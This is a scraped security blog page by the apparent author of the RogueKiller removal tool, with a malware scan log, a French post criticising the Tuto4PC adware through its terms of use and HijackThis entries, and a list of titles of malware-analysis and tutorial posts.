(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\tigzy\Bureau\securityprotection.exe (Trojan.Agent) -> Not selected for removal.
c:\documents and settings\tigzy\local settings\Temp\1.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\Temp\2.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\Temp\3.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
c:\documents and settings\all users\application data\defender.exe (Trojan.FakeAlert) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue should have been deleted

[Adware] Tuto4PC / PCTuto -- Le nouvel adware d'Eorezo

2011-07-16T15:33:00.000-07:00

Un petit post qui change des rogues et autres rootkit pour dénoncer un état d'esprit plus que douteux selon moi, celui deTuto4PC (ou PCTuto). Ce site propose "gratuitement" de télécharger des tutos animés, mais installe un adware sur le PC de l'utilisateur afin de monétiser tout ça et rentabiliser leurs tutoriels.

Si vous vous êtes fait avoir par cet adware, merci de venir en parler ici : http://www.commentcamarche.net/faq/32334-victimes-de-tuto4pc-faites-vous-entendre

Cette société possède un partenariat avec 01net, qui propose le tutoriel dans un lien connexe au lien de téléchargement des logiciels. Si vous êtes mécontents d'avoir été dupés par cet adware, je vous invite à venir l'exprimer dans les avis d'utilisateurs (sur le tuto, pas sur le logiciel en lui même qui n'y est pour rien)

MAJ du 04/10/2011:

Suite au lien ci-dessus, commentcamarche.net a été assigné en justice par notre cher éditeur d'adwares (on se demande bien pour quel motif). L'audience est prévue ce jeudi, nous aurons les résultats dans les jours qui suivent. commentcamarche.net a préféré retiré l'article par précaution avant le jugement.

http://lamaredugof.fr/blog/2011/10/dtc-judiciarisation-des-espaces-d-entraide-informatique/
http://korben.info/tuto4pc.html
http://www.pcinpact.com/actu/news/66141-tuto4pc-commentcamarche-sebsauvage-refere.htm?vc=1
http://fr.news.yahoo.com/tuto4pc-attaque-commentcamarche-net-101534958.html

--------

En réalité, tout est inscrit dans les CGU (vous savez, les lignes que personne ne lit -a tort-). Analyse.

Tout d'abord, sur leur site (où on télécharge l'exécutable) WOT voit rouge.

Voici quelques extraits des CGU:

- Les informations sur l'utilisateur seront communiquées à des partenaires commerciaux
et utilisées par ces derniers (pour de la pub) -

- L'utilisateur va recevoir du SPAM par SMS -

- Idem qu'au dessus, les infos de l'utilisateur (tel portable, etc...) seront communiquées à des partenaires commerciaux -

Le numéro de teléphone est communiqué à l'installation si l'utilisateur ne comprend pas que la page suivante n'est pas obligatoire:

- L'utilisateur va recevoir de la pub sur son PC -

Dès l'installation finie, ça commence:

- Les paramètres du navigateur sont modifiées pour lo.st -

-L'utilisateur accepte l'installation AUTOMATIQUE des logiciels de Tuto4Pc group et de sociétés tierces. En gros, n'importe qui peut installer n'importe quoi sur le PC via le processus résident. C'est là le comportement type d'un Trojan Downloader (Cheval de Troie) -

- Le logiciel collecte des données personnelles, et les envoi à un serveur pour une "étude statistique". Autrement dit, il a un comportement de spyware (sauf que c'est écrit dans les CGU, que personne ne lit)

- La société (règle 9) ne répondra à aucune réclamation, et se dédouane de tout dommage causé au Pc de l'utilisateur après installation du logiciel. Pratique. -

Une fois toutes ces péripéties passées, on voit (enfin) apparaitre le tuto animé. Encore selon moi, ça ne vaut pas un vrai tutoriel fait par un site digne de ce nom.

Au niveau système, les lignes suivantes apparaissent dans le scan hijack this (la ligne lo.st n'apparait pas mais elle y est):

O2 - BHO: T4PCBHO - {AB720781-0670-4e46-B82E-376AEF228F25} - C:\Program Files\Tuto4pc\Tuto4pcBHO.dll

O4 - HKLM\..\Run: [Tuto4pc] "C:\Users\tigzy\AppData\Roaming\Tuto4pc\Tuto4pc\tuto4pc.exe"

O4 - HKLM\..\RunOnce: [UpdateTuto4PCHP] C:\Users\tigzy\AppData\Roaming\Tuto4pc\Tuto4pc\UpdateTuto4PCHP.exe -runonce

Nous avons donc une dll chargée dans une BHO, qui va analyser le trafic internet et envoyer les infos (voir CGU) à Tuto4PC. Nous avons également le programme et son updater qui vont être lancés à chaque démarrage, et pomper inutilement les ressources de l'ordinateur.

>------------<

En conclusion, ne vous faites pas avoir. Il existe des dizaines de sites proposant des tutoriels gratuits, sans aucune monétisation, et avec le seul but de voir les gens évoluer et proposer également des choses bien, basées sur la communauté.

Pour exemple:

Le site du Zéro: http://www.siteduzero.com/
Developpez.com : http://www.developpez.com/
CCM: http://www.commentcamarche.net/
Tuts4you (spécialisé, en anglais) : http://tuts4you.com/download.php

Bref, il suffit de chercher. Les tutos sous forme de page web sur des forums seront de bien meilleures factures, car souvent il est possible de poser des questions sur le forum, ou contacter l'auteur. Et surtout cela ne va pas dans la poche d'une entreprise côtée en bourse.

Quelques liens relatifs à Tuto4Pc:

http://www.malekal.com/2011/07/09/pctutotuto4pc-association-avec-01net/
http://streisand.me/tuto4pc.htm
http://sebsauvage.net/rhaa/index.php?2011/07/05/07/58/09-c-est-chatouilleux-la-bourse
http://www.pcinpact.com/actu/news/64648-cgu-sebsauvage-tuto4pc-eorezo-adware.htm
http://www.malekal.com/2011/07/07/quand-les-avocats-refont-le-web/
http://www.01net.com/editorial/535749/un-bloggeur-menace-de-proces-par-tuto4pc-diffuseur-d-adwares/
http://www.cyroul.com/societe-digitale/la-societe-tuto4pc-cramee-en-6-etapes/
http://secufd.frogz.fr/post/2011/07/17/SebSauvage-vs-Tuto4PC.aspx

Open your mind.

tigzy-RK

[Analysis] PE Structure - Make the smallest executable

PE Structure

Make the smallest executable

REFERENCES

[EN] RogueKiller official tutorial

RogueKiller : Official tutorial

This is a user guide for RogueKiller, a malware removal tool which can be downloaded here:

_ RogueKiller _

VIDEO PRESENTATION (French)

SMARTSCREEN

PRESCAN

SCAN

SUPPRESSION

HOST RAZ

PROXY RAZ

DNS RAZ

Shortcut Fix

DRIVER TAB

MBR TAB

ROGUEKILLER PE

[FR] RogueKiller tutoriel officiel

RogueKiller : Tutoriel officiel

Ceci est un guide d'utilisation de RogueKiller, outil de désinfection antivirus que l'on peut télécharger ici :

_ RogueKiller _

PRESENTATION VIDEO

SMARTSCREEN

PRESCAN

SCAN

SUPPRESSION

HOST RAZ

PROXY RAZ

DNS RAZ

Racc. RAZ

ONGLET DRIVER

ONGLET MBR

ROGUEKILLER PE

[Analysis] Win32.Symmi naked - Decryption

Analysis of Win32.Symmi

Find the key and decrypt the files

Static analysis - What has changed on files?

Dropping the Paypload

Analysing the Payload

Once the payload dumped, and loaded into OllyDbg, we can have a quick overview by looking into the strings and intermodular calls. And this is indeed our encrypter :)

What is remarkable is the call to the APIs : FindFirstFile, FindNextFile (files enumeration), CreateFile (file opening), and WriteFile (file overwriting).

Let's find the key!

Let's restore the files!

[Rogue] Win 8 security System

Windows 8 security system

[Tool] DiffView - Test on ZeroAccess

DiffView : Test on ZeroAccess

[Analysis] Chronicles of a PE Infector

Chronicles of a PE Infector

Scheme of attack

Infect an executable

Here's what we've got at the execution :

Infect all executables

Here's what we've got once Explorer has loaded the DLL :

And after several minutes:

Conclusion

Links

[Analysis] APIMonitor is handy!

APIMonitor (rohitab) is handy!

First Idea : Have a look with APIMonitor

Second part : Take over with OllyDBG

Conclusion

Links

[Rootkit] ZeroAccess (Max++)

Télécharger / Download : Malwarebytes RogueKiller

[Info] Facebook : Détournement de likes

[Info] 01net : Comment monétiser sur le dos des développeurs.

[RansomWare] Gendarmerie Nationale

Télécharger : Malwarebytes RogueKiller

[Rogue] Security Shield

[Rogue] System Check / System restore

[RansomWare] GEMA - L'accès à votre ordinateur a été fermé

[Rogue] XP Security 2012

[Rogue] AV Security 2012